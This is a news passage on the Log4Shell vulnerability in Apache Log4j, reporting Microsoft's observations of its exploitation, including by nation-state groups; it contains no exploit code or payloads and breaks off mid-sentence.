The vulnerability, officially tagged as CVE-2021-44228 and called Log4Shell or LogJam, is an unauthenticated RCE vulnerability that allows total system takeover on systems running Log4j 2.0-beta9 through 2.14.1.
Nation-state hackers of various sorts have pounced on the recently reported major vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging framework.
Microsoft Threat Intelligence Center (MSTIC) observed the critical Log4j bug being exploited to drop Cobalt Strike beacons. As reported by BleepingComputer, MSTIC revised the report to include that it observed nation-state activity using Log4Shell, sometimes during active assaults.
MSTIC updated the report on Tuesday to add that it detected nation-state activity using Log4Shell, sometimes in active attacks. The researchers tracked groups “groups originating from China, Iran, North Korea, and Turkey.”
MSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.
For example, MSTIC has observed PHOSPHORUS, an